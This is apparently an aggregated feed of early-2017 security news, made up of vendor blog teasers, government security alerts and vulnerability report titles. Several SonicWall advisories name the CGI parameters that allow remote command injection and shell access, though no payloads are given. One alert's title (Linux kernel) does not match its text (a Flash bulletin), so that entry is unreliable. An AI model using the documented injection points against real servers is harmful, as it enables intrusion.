Service insertion refers to the adding of networking services, such as firewalls or load balancers, into the forwarding path of traffic. Service chaining builds on service insertion, allow the linkage of multiple services in a prescribed manner, such as proceeding through a firewall then an IPS, and finally malware protection before forwarding to the end... The post Service Insertion and Service Chaining Defined appeared first on Cato Networks.

https://www.catonetworks.com/blog/service-insertion-and-service-chaining-defined/
The Carrier Cloud Needs a New Fabric, Not a Patched Cloth
2017-04-25T11:44:41Z | 1493120681

Over the past two decades, carriers have built massive global networking platforms that are faithfully serving many enterprises. At a premium cost. MPLS-based services are under pressure from emerging Internet-based solutions. With MPLS revenue streams at risk, the carriers are pursuing a two-prong strategy: augmenting MPLS with Software-Defined Wide Area Networking (SD-WAN) and adding value-add... The post The Carrier Cloud Needs a New Fabric, Not a Patched Cloth appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-carrier-cloud-needs-a-new-fabric-not-a-patched-cloth/
Security Alert (A17-04-08): Vulnerability in IBM Domino
2017-04-21T04:00:00Z | 1492747200

IBM has issued a security bulletin to address a stack-based buffer overflow vulnerability in IMAP service. Reports indicate that there is public exploit code available.

https://www.govcert.gov.hk/en/alerts_detail.php
Moxa AWK-3131A Hard-coded Administrator Credentials Vulnerability
2017-04-21T00:00:00Z | 1492732800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0231
Security Alert (A17-04-07): Multiple Vulnerabilities in Firefox
2017-04-20T04:00:00Z | 1492660800

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
4 Tangible Reasons for Considering SD-WANs
2017-04-19T09:40:52Z | 1492594852

With any new technology there’s “fake news” and SD-WANs are no exception. It’s true, SD-WANs probably won’t reduce your WAN costs by 90 percent or make WANs so simple a 12-year old can deploy them.  But there are plenty of reasons to be genuinely excited about the technology — and we’re not just talking about... The post 4 Tangible Reasons for Considering SD-WANs appeared first on Cato Networks.

https://www.catonetworks.com/blog/4-tangible-reasons-for-considering-sd-wans/
Security Alert (A17-04-06): Multiple Vulnerabilities in Oracle Java and Oracle Products (April 2017)
2017-04-19T04:00:00Z | 1492574400

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
ARM Mbedtls x509 ECDSA invalid public key Remote Code Execution Vulnerability
2017-04-19T00:00:00Z | 1492560000

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0274
FIRST releases twenty years of conference materials
2017-04-18T13:00:00Z | 1492520400

The leading association of incident response and security teams publishes its repository of twenty years of incident response learnings.

https://www.first.org/newsroom/releases/20170418
SD-WANs for SMEs
2017-04-18T08:51:47Z | 1492505507

With any new technology, there’s a rush to offer features required by the biggest and bravest of companies and SD-WANs are no exception. But if you’re a small- to medium-sized enterprise and not a Fortune 50 retailer, what SD-WAN features do you really need to be considering? We’ll answer that question and a whole lot... The post SD-WANs for SMEs appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wans-for-smes/
Moxa AWK-3131A Web Application Ping Command Injection Vulnerability
2017-04-18T00:00:00Z | 1492473600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0235
Lexmark Perceptive Document Filters XLS ShapeHLink Information Disclosure Vulnerability
2017-04-18T00:00:00Z | 1492473600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0302
A walk down memory lane
2017-04-14T10:50:11Z | 1492167011

Admit it. Every now and then someone does something, and you think: “I also had that idea!” You feel validated — a kindred spirit has had the same intuitions, the same insights, and even drawn the same conclusions. I was reminded of this feeling recently when I came across a paper describing how to use […]

https://blog.trailofbits.com/2017/04/14/a-walk-down-memory-lane/
Security Alert (A17-04-05): Multiple Vulnerabilities in ISC BIND
2017-04-13T04:00:00Z | 1492056000

Multiple vulnerabilities were found in the ISC BIND software. Both authoritative and recursive name servers are affected.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-04-03): Multiple Vulnerabilities in Microsoft Products (April 2017)
2017-04-12T04:00:00Z | 1491969600

Microsoft has released 46 security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-04-04): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2017-04-12T04:00:00Z | 1491969600

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities caused by heap buffer overflow, integer buffer overflow, use-after-free error, memory corruption, and directory search path issue.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST and OASIS sign agreement to cooperate and promote cybersecurity standardization
2017-04-11T13:00:00Z | 1491915600

Memorandum of Understanding enables organizations to improve international cooperation on developing standards for cybersecurity.

https://www.first.org/newsroom/releases/20170411
Security Alert (A17-04-02): Vulnerability in Microsoft Office
2017-04-11T04:00:00Z | 1491883200

A vulnerability is caused by the OLE2Link object issue. Reports indicate that the vulnerability is being exploited in the wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Moxa AWK-3131A Web Application Multiple Reflected Cross-Site Scripting Vulnerabilities
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0233
Moxa AWK-3131A Web Application onekey Information Disclosure Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0241
Moxa AWK-3131A Web Application Cleartext Transmission of Password Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0230
Moxa AWK-3131A Web Application Cross-Site Request Forgery Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0232
Moxa AWK-3131A Web Application systemlog.log Information Disclosure Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0239
Moxa AWK-3131A web_runScript Header Manipulation Denial of Service Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0240
Moxa AWK-3131A Web Application Nonce Reuse Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0225
Moxa AWK-3131A serviceAgent Information Disclosure Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0238
Moxa AWK-3131A Web Application asqc.asp Information Disclosure Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0236
Moxa AWK-3131A Web Application bkpath HTTP Header Injection Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0234
Moxa AWK-3131A HTTP GET Denial of Service Vulnerability
2017-04-10T00:00:00Z | 1491782400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0237
Security Alert (A17-04-01): Vulnerability in Apple iOS
2017-04-07T04:00:00Z | 1491537600

Apple has released software update fixing one vulnerability in iOS versions prior to iOS 10.3.1.

https://www.govcert.gov.hk/en/alerts_detail.php
The WebEx Chrome Extension Vulnerability and the Power of Virtual Patching
2017-04-03T12:32:08Z | 1491222728

A security team’s life would be so much easier if users would simply comply with common sense. Don’t click on that unknown executable. Ignore that missing Nigerian prince who’s now turning to you, and of course only you, for help for which he’ll reward you handsomely. Skip that website that you KNOW carries malware. But... The post The WebEx Chrome Extension Vulnerability and the Power of Virtual Patching appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-webex-chrome-extension-vulnerability-and-the-power-of-virtual-patching/
Security Alert (A17-03-10): Multiple Vulnerabilities in Apple iOS
2017-03-30T04:00:00Z | 1490846400

Apple has released software update fixing 88 vulnerabilities in iOS versions prior to iOS 10.3.

https://www.govcert.gov.hk/en/alerts_detail.php
Network Time Protocol Origin Timestamp Check Denial of Service Vulnerability
2017-03-29T00:00:00Z | 1490745600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0260
RIA: Elutähtsate teenuste küberturvalisus on olulisem kui kunagi varem
2017-03-28T21:00:00Z | 1490734800

Küberkuritegevus ja halvenenud rahvusvaheline julgeolekuolukord nõuab Eestilt küberturvalisuse tagamisel era- ja riigisektori varasemast tihedamat koostööd ning ka küberturvalisuse valdkonna õigusruumi korrastamist.

https://ria.ee/uudised/ria-elutahtsate-teenuste-kuberturvalisus-olulisem-kui-kunagi-varem
The WAN Survey: Learn From Your Peers
2017-03-28T13:19:32Z | 1490707172

How will SD-WANs impact your business? Find out when you participate in our annual state of the WAN survey. The survey evaluates satisfaction levels and adoption rates of new wide area network (WAN) technologies, such as SD-WAN. Participants provide insight into how their organizations are: Adapting to the changes in the WAN Accommodating mobile users... The post The WAN Survey: Learn From Your Peers appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-wan-survey-learn-from-your-peers/
Security Alert (A17-03-09): Multiple Vulnerabilities in IBM Notes
2017-03-28T04:00:00Z | 1490673600

Multiple vulnerabilities are found in IBM Lotus Notes related to Expat XML Parser.

https://www.govcert.gov.hk/en/alerts_detail.php
What You Need to Know About Caching Video Series
2017-03-28T04:00:00Z | 1490673600

In this "unofficial" video series, Akamai Solutions Engineers Tedd Smith and CJ Arnesen explain the basics of caching: what it is, why it's important, and how to get the most out of it. A great introduction to Akamai, caching, and content delivery network (CDN) basics, this series supplements Akamai Quick Starts and User Guides to help you level set new team members and other departments within your organization.

https://www.akamai.com/blog/developers/what-you-need-know-about-caching-part-1
SambaCry, the Seven Year Old Samba Vulnerability, is the Next Big Threat (for now)
2017-03-25T13:00:00Z | 1490446800

As Samba is used as part of many organizations storage systems, we will discuss the impact of the vulnerability on organizations and home users.

https://www.akamai.com/blog/security/sambacry-seven-year-old-samba
April means Infiltrate
2017-03-23T10:50:49Z | 1490266249

Break out your guayabera, it’s time for Infiltrate. Trail of Bits has attended every Infiltrate and has been a sponsor since 2015. The majority of the company will be in attendance this year (18 people!) and we’ll be swapping shirts and swag again. We’re looking forward to catching up with the latest research presented there […]

https://blog.trailofbits.com/2017/03/23/april-means-infiltrate/
What’s Wrong with a Digital Geneva Convention?
2017-03-23T10:09:16Z | 1490263756

Listening to the calls for “vendor cooperation” and “to come together” from the RSA show last month was exciting, even invigorating, but I suspect for those in the trenches of security, something a bit more practical is necessary.  And what better place to find those practical advice than the oracle of all wisdom — mom.... The post What’s Wrong with a Digital Geneva Convention? appeared first on Cato Networks.

https://www.catonetworks.com/blog/whats-wrong-with-a-digital-geneva-convention/
Security Alert (A17-03-08): Multiple Vulnerabilities in Cisco Products (March 2017)
2017-03-23T04:00:00Z | 1490241600

Cisco has released 5 security advisories fixing a number of vulnerabilities in Cisco IOS and IOS XE software.

https://www.govcert.gov.hk/en/alerts_detail.php
National Instruments LabVIEW LvVarientUnflatten Code Execution Vulnerability
2017-03-22T00:00:00Z | 1490140800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0269
Cato Research Decrypts the News Behind February Security Events
2017-03-20T13:50:32Z | 1490017832

Witnessing the first SHA-1 collision was pretty heady stuff, but it’s not the only security event of note last month. Cato Research Labs identified a number of attacks, threats, and bugs introduced in February that you need to defend against. Here they are with insights and recommended steps from our research team. Windows SMBv3 Denial... The post Cato Research Decrypts the News Behind February Security Events appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-research-decrypts-the-news-behind-february-security-events/
Security Alert (A17-03-06): Vulnerability in Firefox
2017-03-20T04:00:00Z | 1489982400

Mozilla has published a security advisory to address a vulnerability found in Firefox. This vulnerability is caused by integer overflow.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-03-07): Vulnerability in Cisco Products
2017-03-20T04:00:00Z | 1489982400

Cisco has released a security advisory about a vulnerability in Cisco devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-03-05): Vulnerability in Linux Kernel
2017-03-17T04:00:00Z | 1489723200

Microsoft has released a security bulletin (MS17-005 Security Update for Adobe Flash Player) fixing multiple vulnerabilities in Adobe Flash Player installing on all supported editions of Microsoft Windows.

https://www.govcert.gov.hk/en/alerts_detail.php
How To Migrate to a Multi-Cloud Deployment
2017-03-15T07:36:44Z | 1489563404

As cloud migration becomes the norm for IT, enterprises of all sizes need to connect, secure and manage complex physical and cloud-based datacenters. What challenges will you face and how will you address them? Join us on our upcoming webinar, “Multi-Cloud and Hybrid Cloud: Securely Connecting Your Cloud Datacenters” as Hal Zamir, vice president of infrastructure for... The post How To Migrate to a Multi-Cloud Deployment appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-migrate-to-a-multi-cloud-deployment/
Security Alert (A17-03-03): Multiple Vulnerabilities in Microsoft Products (March 2017)
2017-03-15T04:00:00Z | 1489550400

Microsoft has released 18 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-03-04): Multiple Vulnerabilities in Adobe Flash Player
2017-03-15T04:00:00Z | 1489550400

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by buffer overflow, memory corruption, random number generator flaw and use-after-free error.

https://www.govcert.gov.hk/en/alerts_detail.php
McSema: I’m liftin’ it
2017-03-14T10:50:41Z | 1489488641

McSema, our x86 machine code to LLVM bitcode binary translator, just got a fresh coat of paint. Last week we held a successful hackathon that produced substantial improvements to McSema’s usability, documentation, and code quality. It’s now easier than ever to use McSema to analyze and reverse-engineer binaries. Growth stage We use McSema on a […]

https://blog.trailofbits.com/2017/03/14/mcsema-im-liftin-it/
R PDF LoadEncoding Code Execution Vulnerability
2017-03-09T00:00:00Z | 1489017600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0227
Apple OS X and iOS x509 certificate parsing Name Constraints Remote Code Execution Vulnerability
2017-03-09T00:00:00Z | 1489017600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0296
Four Questions For Life After MPLS
2017-03-08T09:12:44Z | 1488964364

Anyone who’s purchased MPLS bandwidth has experienced the surreal. While at home you might spend $50 for a 50 Mbps Internet link, MPLS services can cost 10 times more for a fraction of the bandwidth.  SD-WANs promise to address the problem, of course, but even as an SD-WAN provider we can tell you that SD-WANs... The post Four Questions For Life After MPLS appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-re-evaluate-your-mpls-provider-the-ultimate-checklist/
Security Alert (A17-03-01): Vulnerability in Apache Struts
2017-03-08T04:00:00Z | 1488945600

A vulnerability is found at the jakarta based file upload Multipart parser of Apache Struts2 that could allow remote code execution at the affected application server.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A17-03-02): Multiple Vulnerabilities in Firefox
2017-03-08T04:00:00Z | 1488945600

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by memory corruption, use-after-free error and memory safety bugs, etc.

https://www.govcert.gov.hk/en/alerts_detail.php
Pharos PopUp Printer Client memcpy Code Execution Vulnerability
2017-03-07T00:00:00Z | 1488844800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0282
Pharos PopUp Printer Client DecodeString Code Execution Vulnerability
2017-03-07T00:00:00Z | 1488844800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0280
Pharos PopUp Printer Client DecodeBinary Code Execution Vulnerability
2017-03-07T00:00:00Z | 1488844800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0283
Pharos PopUp Printer Client DecodeString Code Execution Vulnerability
2017-03-07T00:00:00Z | 1488844800

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0281
MKM: Eesti ja Soome moodustavad ühise mittetulundusühingu X-tee arendamiseks
2017-03-06T22:00:00Z | 1488837600

Täna, 7. märtsil, allkirjastasid ettevõtlus- ja infotehnoloogiaminister Urve Palo ning Soome väliskaubandus- ja arenguminister Kai Mykkänen Eesti-Soome koostöölepingu, mille alusel moodustatakse ühine mittetulundusühing X-tee arendamiseks. Asutatava MTÜ nimeks on Nordic Institute for Interoperability Solutions ehk Põhjamaade Koosvõimelahenduste Instituut ning see hakkab paiknema Eestis.

https://ria.ee/uudised/mkm-eesti-ja-soome-moodustavad-uhise-mittetulundusuhingu-x-tee-arendamiseks
Security + Network As a Service: the Better SD-WAN
2017-03-05T11:18:26Z | 1488712706

We’ve been discussing the impact the dissolving perimeter has had on networking and IT. Changes in our applications (cloud migration) and where users work (mobility) are driving the shift to software defined wide area networks (SD-WANs), but they’re also forcing us to rethink how we securely connect our users, application and data and deliver a... The post Security + Network As a Service: the Better SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/security-network-as-a-service-the-better-sd-wan/
Riigiportaalis saab vaadata enda kohta tehtud päringuid
2017-03-01T22:00:00Z | 1488405600

Sellest nädalast saab portaalis eesti.ee vaadata, kes on X-tee vahendusel sinu kohta päringuid teinud.

https://ria.ee/uudised/riigiportaalis-saab-vaadata-enda-kohta-tehtud-paringuid
How SD-WANs Can Become Next Generation WAN Architectures
2017-03-01T12:53:15Z | 1488372795

While SD-WANs are a valuable first step towards evolving the wide area network, they only address a small part of the dissolved enterprise perimeter challenge.  With the rise of mobility, cloud datacenters, and Software as a Service (SaaS) the classical demarcation between public and private networks becomes less relevant, driving changes in four IT disciplines... The post How SD-WANs Can Become Next Generation WAN Architectures appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-sd-wans-can-become-next-generation-wan-architectures/
The Promise and Peril of SD-WANs
2017-02-27T12:45:04Z | 1488199504

Software-Defined Wide Area Networks (SD-WANs) promised to address the high costs, rigidity and limitations of private MPLS services. Like so many technologies, though, there are the promises of SD-WANs and then there are the realities of SD-WANs. SD-WANs reduce bandwidth costs, no doubt, but enterprises are still left having to address important issues around cloud,... The post The Promise and Peril of SD-WANs appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-promise-and-peril-of-sd-wans/
Iceni Argus PDF Uninitialized WordStyle Color Length Code Execution Vulnerability
2017-02-27T00:00:00Z | 1488153600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0210
Iceni Argus PDF TextToPolys Rasterization Code Execution Vulnerability
2017-02-27T00:00:00Z | 1488153600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0214
Iceni Argus ipStringCreate Code Execution Vulnerability
2017-02-27T00:00:00Z | 1488153600

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0271
Ichitaro Office Excel File Code Execution Vulnerability
2017-02-27T00:00:00Z | 1488153600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0197
Iceni Argus PDF Font-Encoding GlyphMap Adjustment Code Execution Vulnerability
2017-02-27T00:00:00Z | 1488153600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0213
Iceni Argus TrueType Font File Cmap Table Code Execution Vulnerability
2017-02-27T00:00:00Z | 1488153600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0211
Iceni Argus icnChainAlloc Signed Comparison Code Execution Vulnerability
2017-02-27T00:00:00Z | 1488153600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0228
Iceni Argus PDF Inflate+LZW Decompression Heap-Based Buffer Overflow Vulnerability
2017-02-27T00:00:00Z | 1488153600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0212
A Guide to WAN Architecture & Design
2017-02-26T12:39:21Z | 1488112761

We, at Cato Networks, are excited to sponsor the 2017 Guide to WAN Architecture & Design. The wide area network (WAN) is a critical and fundamental resource for any business. As we will discuss in this guide, the WAN is evolving, so the architecture must evolve, as well. The new architecture should address the future... The post A Guide to WAN Architecture & Design appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-guide-to-wan-architecture-design-state-of-the-wan/
0.2 BTC Strikes Back, Now Attacking MySQL Databases
2017-02-24T14:00:00Z | 1487944800

In this post we will describe how GGSN detected a wide ransomware attack targeting MySQL databases and provide recommendations on how to protect your database.

https://www.akamai.com/blog/security/btc-strikes-back-now-attacking-mysql-databases
Ichitaro Word Processor PersistDirectory Code Execution Vulnerability
2017-02-24T00:00:00Z | 1487894400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0199
Ichitaro Office JTD Figure handling Code Execution Vulnerability
2017-02-24T00:00:00Z | 1487894400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0196
ID-kaarti on kauguuendanud 100 000 inimest
2017-02-22T22:00:00Z | 1487800800

Möödunud 11 kuuga on ID-kaardi sertifikaate uuendanud 100 000 kasutajat.

https://ria.ee/uudised/id-kaarti-kauguuendanud-100-000-inimest
Remote Code Execution, Phishing, and More: Cato Research Labs Reviews January Security Events
2017-02-22T15:05:49Z | 1487775949

January started out with a bang as Check Point showed that pictures can be worth for more to hackers than just a 1,000 words. Embedding threats in images, though, wasn’t the only security story of significance last month. A number of other stories (and not of the political kind) also occupied the topics of conversation... The post Remote Code Execution, Phishing, and More: Cato Research Labs Reviews January Security Events appeared first on Cato Networks.

https://www.catonetworks.com/blog/remote-code-execution-phishing-and-more-cato-research-labs-reviews-the-month-that-was-in-security/
Dell SonicWall Secure Remote Access Multiple Command Injection Vulnerabilities
2017-02-22T05:59:00Z | 1487743140

The SonicWall Secure Remote Access server (version 8.1.0.2-14sv) is vulnerable to a Remote Command Injection vulnerability in its web administrative interface. This vulnerability occurs in the 'viewcert' CGI (/cgi-bin/viewcert) component responsible for processing SSL certificate information. The CGI application doesn't properly escape the information it's passed in the 'CERT' variable before a call to system() is performed - allowing for remote command injection. Exploitation of this vulnerability yields shell access to the remote machine under the nobody user account. CVE: CVE-2016-9684 Last updated: March 2, 2017, 2:59 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2016-0005
Dell SonicWall Secure Remote Access Multiple Command Injection Vulnerabilities
2017-02-22T05:59:00Z | 1487743140

The SonicWall Secure Remote Access server (version 8.1.0.2-14sv) is vulnerable to a Remote Command Injection vulnerability in its web administrative interface. This vulnerability occurs in the 'extensionsettings' CGI (/cgi-bin/extensionsettings) component responsible for handling some of the server's internal configurations. The CGI application doesn't properly escape the information it's passed when processing a particular multi-part form request involving scripts. The filename of the 'scriptname' variable is read in unsanitized before a call to system() is performed - allowing for remote command injection. Exploitation of this vulnerability yields shell access to the remote machine under the nobody user account. This is SonicWall Issue ID 181195. CVE: CVE-2016-9683 Last updated: March 2, 2017, 2:59 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2016-0004
Dell SonicWall Secure Remote Access Multiple Command Injection Vulnerabilities
2017-02-22T05:59:00Z | 1487743140

The SonicWall Secure Remote Access server (version 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in its web administrative interface. These vulnerabilities occur in the diagnostics CGI (/cgi-bin/diagnostics) component responsible for emailing out information about the state of the system. The application doesn't properly escape the information passed in the 'tsrDeleteRestartedFile' or 'currentTSREmailTo' variables before making a call to system(), allowing for remote command injection. Exploitation of this vulnerability yields shell access to the remote machine under the nobody user account. CVE: CVE-2016-9682 Last updated: Aug. 12, 2017, 1:29 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2016-0003
Security Alert (A17-02-03): Adobe Flash Player Vulnerabilities in Microsoft Products
2017-02-22T04:00:00Z | 1487736000

Microsoft has released a security bulletin (MS17-005 Security Update for Adobe Flash Player) fixing multiple vulnerabilities in Adobe Flash Player installing on all supported editions of Microsoft Windows.

https://www.govcert.gov.hk/en/alerts_detail.php
Cato Takes Finalist in RSA Innovation Sandbox
2017-02-21T10:52:48Z | 1487674368

We were honored to be nominated as a finalist for 2017 RSA Innovation Sandbox Contest at last week’s show.  The nomination recognized our groundbreaking work in rethinking networking and security. Shlomo presented the Cato value proposition to the judging panel and you can see it yourself here. As anyone who’s been involved in networking or... The post Cato Takes Finalist in RSA Innovation Sandbox appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-takes-finalist-in-rsa-innovation-sandbox/
Aerospike Database Server RW Fabric Message Particle Type Code Execution Vulnerability
2017-02-21T00:00:00Z | 1487635200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0267
Aerospike Database Server Client Batch Request Code Execution Vulnerability
2017-02-21T00:00:00Z | 1487635200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0265
Aerospike Database Server Fabric-Worker Socket-Loop Denial-of-Service Vulnerability
2017-02-21T00:00:00Z | 1487635200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0263
The Challenges of Deploying Security Mitigations
2017-02-20T14:15:41Z | 1487600141

This blog has promoted control flow integrity (CFI) as a game changing security mitigation and encouraged its use. We wanted to take our own security advice and start securing software we use. To that end, we decided to apply CFI to facebook’s osquery, a cross-platform codebase with which we are deeply familiar. Using osquery, we […]

https://blog.trailofbits.com/2017/02/20/the-challenges-of-deploying-security-mitigations/
The Smart Fuzzer Revolution
2017-02-16T11:50:08Z | 1487245808

I recently had the privilege of giving a keynote at BSidesLisbon. I had a great time at the conference, and I’d like to thank Bruno Morisson for inviting me. If you’re into port, this is the conference for you! I recommend that anyone in the area consider attending next year. I felt there was a […]

https://blog.trailofbits.com/2017/02/16/the-smart-fuzzer-revolution/
Deception and Kerckhoffs’s Cryptographic Principle
2017-02-16T10:50:52Z | 1487242252

The parallels between deception in the real-world, and deception in cyberspace are clear and easy to understand. However, deception in the digital battlefield is far more nuanced — it’s easy to do it badly, and far harder to get it right. Which makes it rather similar to a more traditional security practice — cryptography.

https://www.smokescreen.io/deception-and-kerckhoffss-cryptographic-principle/
Ticketbleed Undermines SSL Security
2017-02-16T05:43:59Z | 1487223839

The recent report that F5’s Big-IP leaks memory once again underscores the risks of relying heavily on security appliances. The exploit, called “Ticketbleed” could enable attackers to intercept SSL traffic.  The name comes from the Heartbleed exploit that caused headaches in 2014, reports the Register. According to the description in the National Vulnerability Database with... The post Ticketbleed Undermines SSL Security appeared first on Cato Networks.

https://www.catonetworks.com/blog/ticketbleed-undermines-ssl-security/
Security Alert (A17-02-02): Multiple Vulnerabilities in Adobe Flash Player
2017-02-15T04:00:00Z | 1487131200

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by integer overflow, heap buffer overflow, use-after-free error, memory corruption, and type confusion.

https://www.govcert.gov.hk/en/alerts_detail.php
Apple GarageBand Out of Bounds Write Code Execution Vulnerability
2017-02-14T00:00:00Z | 1487030400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0275
Apple GarageBand Out of Bounds Write Code Execution Vulnerability
2017-02-14T00:00:00Z | 1487030400

https://talosintelligence.com/vulnerability_reports/TALOS-2017-0262
Critical Capabilities for a Successful SD-WAN Deployment
2017-02-13T14:29:05Z | 1486996145

Last month, analyst Jim Metzler and I joined together on a webinar to discuss the current state of the WAN. Jim shared research from his recent study into the current drivers and inhibitors for WAN transformation and the deployment of SD-WAN. I dove into how Cato addresses those challenges, including showing our new SD-WAN offering.... The post Critical Capabilities for a Successful SD-WAN Deployment appeared first on Cato Networks.

https://www.catonetworks.com/blog/critical-capabilities-for-a-successful-sdwan-deployment/
Devirtualizing C++ with Binary Ninja
2017-02-13T11:50:32Z | 1486986632

In my first blog post, I introduced the general structure of Binary Ninja’s Low Level IL (LLIL), as well as how to traverse and manipulate it with the Python API. Now, we’ll do something a little more interesting. Reverse engineering binaries compiled from object-oriented languages can be challenging, particularly when it comes to virtual functions. […]

https://blog.trailofbits.com/2017/02/13/devirtualizing-c-with-binary-ninja/
Security Alert (A17-02-01): Vulnerability in ISC BIND
2017-02-10T04:00:00Z | 1486699200

A vulnerability were found in the ISC BIND software. A remote attacker could send a specially crafted query to trigger an assertion failure or read a NULL pointer which could cause the BIND to exit.

https://www.govcert.gov.hk/en/alerts_detail.php
Smart-ID ei võimalda anda omakäelise allkirjaga võrdset digitaalallkirja
2017-02-09T22:00:00Z | 1486677600

Riigi Infosüsteemi Ameti hinnangul ei võimalda turule sisenev Smart-ID anda omakäelise allkirjaga võrdset elektroonset allkirja ehk digitaalallkirja.

https://ria.ee/uudised/smart-id-ei-voimalda-anda-omakaelise-allkirjaga-vordset-digitaalallkirja
451 Research Reviews the Cato Cloud
2017-02-09T11:31:28Z | 1486639888

Medium-sized enterprises face a broad range of challenges in networking and security. Cato addresses those challenges by integrating the two domains in what a recent 451 Research recently described as representing “one of the significant conceptual takedowns of security-as-overlay.”  You can read the report in its entirety here. Noting that Cato is “disruptive” and offering... The post 451 Research Reviews the Cato Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/451-research-reviews-the-cato-cloud/
How MSSPs Can Drop The Box
2017-02-03T18:59:36Z | 1486148376

MSSPs (Managed Security Service Providers) know all too well the challenges enterprises face when managing their security appliances. After all it’s those challenges that give MSSPs their business. What’s less clear, is how MSSPs can deliver security services and meet those challenges in a way that builds a profitable business. Cloud security service provide an answer.... The post How MSSPs Can Drop The Box appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-mssps-can-drop-the-box/
Nitro Pro 10 PDF Handling Code Execution Vulnerability
2017-02-03T00:00:00Z | 1486080000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0226
Nitro Pro PDF Handling Code Execution Vulnerability
2017-02-03T00:00:00Z | 1486080000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0218
Nitro Pro 10 PDF Handling Code Execution Vulnerability
2017-02-03T00:00:00Z | 1486080000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0224
USA salateenistus koolitab koos RIAga Eesti küberturbeeksperte
2017-02-01T22:00:00Z | 1485986400

Ameerika Ühendriikide Salateenistuse eksperdid õpetavad koostöös Riigi Infosüsteemi Ametiga Eesti õiguskaitseorganite töötajaid ja küberturvalisuse eksperte.

https://ria.ee/uudised/usa-salateenistus-koolitab-koos-riaga-eesti-kuberturbeeksperte
McAfee ePolicy Orchestrator DataChannel Blind SQL Injection Vulnerability
2017-02-01T00:00:00Z | 1485907200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0229
Palume uuendada ID-tarkvara
2017-01-31T22:00:00Z | 1485900000

